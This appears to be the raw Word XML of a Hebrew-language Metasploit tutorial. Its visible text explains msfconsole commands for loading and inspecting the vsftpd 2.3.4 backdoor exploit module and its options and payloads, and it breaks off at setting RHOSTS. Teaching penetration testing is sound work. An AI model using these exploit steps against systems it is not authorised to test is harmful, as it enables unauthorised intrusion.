          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לפני</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332975BB" w14:textId="51030B65" w:rsidR="00F654FA" w:rsidRPr="007D51BF" w:rsidRDefault="00F654FA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36416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3848E5AA" wp14:editId="5BBF6E6D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6644640" cy="422662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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w: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unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69410135" w14:textId="76AC7B50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7DD84C0E" w14:textId="3E3B2958" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="009425BF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0E5E3B" wp14:editId="61C98759">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>773430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>55880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4385310" cy="236220"/>
                <wp:effectExtent l="19050" t="19050" r="15240" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="129" name="מלבן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531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AF1AC" id="מלבן 129" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:60.9pt;margin-top:4.4pt;width:345.3pt;height:18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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006E68E4"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37440" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06190E79" wp14:editId="5011646A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6644640" cy="430792"/>
            <wp:effectExtent l="0" t="0" r="3810" b="762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44B62" w14:textId="41AB13B9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059CE538" w14:textId="47F983D0" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77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35392" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4404F217" wp14:editId="4A42B0C8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3876904" cy="2849880"/>
            <wp:effectExtent l="0" t="0" r="9525" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="82" name="תמונה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04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8E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">נשתמש בפקודה </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כדי להציג עוד מידע על המודול הספציפי הזה או על כל מודול אחר שנשתמש בו בהמשך</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F12370F" w14:textId="7D7AFF4B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28D7309D" w14:textId="7205CA1D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270BBBE" w14:textId="220DD253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9DF5785" w14:textId="15964525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282D4795" w14:textId="6388442F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C1FF6CB" w14:textId="23D4B9FA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3C7F2114" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="00931C77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37013048" w14:textId="3BFCA46B" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="007E57B1" w:rsidP="00931C77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169307" wp14:editId="648D2B3A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2775857</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>14877</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2286000" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="116" name="מלבן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7BDF0" id="מלבן 116" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:218.55pt;margin-top:1.15pt;width:180pt;height:3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" filled="f" strokecolor="yellow" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00931C77" w:rsidRPr="007D51BF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922B07B" wp14:editId="03E83427">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2750820</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>492760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2819400" cy="320040"/>
                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="134" name="מלבן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C4D03" id="מלבן 134" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:216.6pt;margin-top:38.8pt;width:222pt;height:25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" filled="f" strokecolor="yellow" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2C9F21" w14:textId="1CB56762" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="000B193E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lastRenderedPageBreak/>
        <w:t>ונוכל להראות שמוצג לפנינו מידע רב שיכול לשמש אותנו לביצוע המתקפה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E1981F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נציג את אפשרויות שצריך להגדיר</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17959CBB" w14:textId="0C8AC6BD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עם הפקודה: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA5FA3" w14:textId="25B4ABF9" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="0095077F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36239C" wp14:editId="0C35DFD3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>826770</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>222250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2198370" cy="171450"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="38" name="מלב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F330" id="מלבן 38" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:65.1pt;margin-top:17.5pt;width:173.1pt;height:13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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006E68E4"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80096" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="792FBE2F" wp14:editId="0972320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644640" cy="2400300"/>
            <wp:effectExtent l="0" t="0" r="381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3E8C6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5CA5D7BC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1521F0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B54344" wp14:editId="4EE236E8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>15240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>207645</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2011680" cy="198120"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="74" name="מלבן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A358F" id="מלבן 74" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:1.2pt;margin-top:16.35pt;width:158.4pt;height:15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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D9102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3A30D36B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E2B739A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3FEE2F0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455051A" w14:textId="0B403A55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0B0694D" w14:textId="77777777" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="00CE457A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ניתן להציג אפשרויות נוספות באמצעות הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show advanced</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E115D97" w14:textId="01F34C24" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="00CE457A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F6BB495" wp14:editId="35BFD8DD">
            <wp:extent cx="6644640" cy="2232660"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="130" name="תמונה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3B7A" w14:textId="23F8782B" w:rsidR="00E84A07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לאחר הצגת הנתונים יש לשים מה מבקשים מאיתנו אפשר לראות</w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ברוב המקרים</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בעמודת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> במידה ומופיע </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">yes </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E84A07" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>יש</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> למלא את הערך המבוקש כדי שההתקפה </w:t>
      </w:r>
      <w:r w:rsidR="0095077F" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>תפעל</w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. יש מקרים בהם יופיע </w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ב</w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אך לא חייב למלא אותם.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB19036" w14:textId="61C9D986" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="0095077F" w:rsidP="0095077F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כדי לממש התקפה ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> צריך להשתמש ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הוא קוד שנבנה במיוחד כדי לנצל חולשה במערכת מסוימת. יש מקרים בהם </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 יכול לנצל חולשה של כמה מערכות. לכן חשוב לשים לב שה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שמשתמשים בו תואם את המערכת הנתקפת.</w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F63253" w14:textId="3AB8E22E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דבר נוסף הוא ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בכל התקפה עם </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נשתמש ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הוא קוד שרץ על המחשב הנתקף ומאפשר להתחבר </w:t>
      </w:r>
      <w:r w:rsidR="00BC7A6B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">אליו </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ולהריץ פקודות תלוי ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.payload</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ברוב המקרים ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> יוגדר אוטומטית </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F5514E" w14:textId="0A79BA4C" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F" w:rsidP="006E68E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די לראות</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> את </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi" w:hint="cs"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">כל </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ה</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">payloads </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הפקודה </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233CC4D3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34368" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57614CC1" wp14:editId="7CF71EB8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6644640" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="81" name="תמונה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7A1ED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55EBE1AE" w14:textId="22654722" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="009D3A4F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266A72A" wp14:editId="7AA22FD3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>419100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>173990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1074420" cy="289560"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="133" name="מלבן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55598" id="מלבן 133" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:33pt;margin-top:13.7pt;width:84.6pt;height:22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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DAF4B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658A90E" w14:textId="3430071F" w:rsidR="009F468F" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="009F468F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi" w:hint="cs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במקרה הזה יש לנו </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 שהוגדר אוטומטית</w:t>
      </w:r>
      <w:r w:rsidR="00D732F6" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F468F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi" w:hint="cs"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> יש מודולים עם יותר </w:t>
      </w:r>
      <w:r w:rsidR="009F468F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payloads</w:t>
      </w:r>
      <w:r w:rsidR="009F468F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi" w:hint="cs"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0A40C" w14:textId="318DFD5D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lastRenderedPageBreak/>
        <w:t xml:space="preserve">כמו שאנחנו רואים בהגדרות בערך שמבקשים מאיתנו </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RHOSTS</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> זו כתובת</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
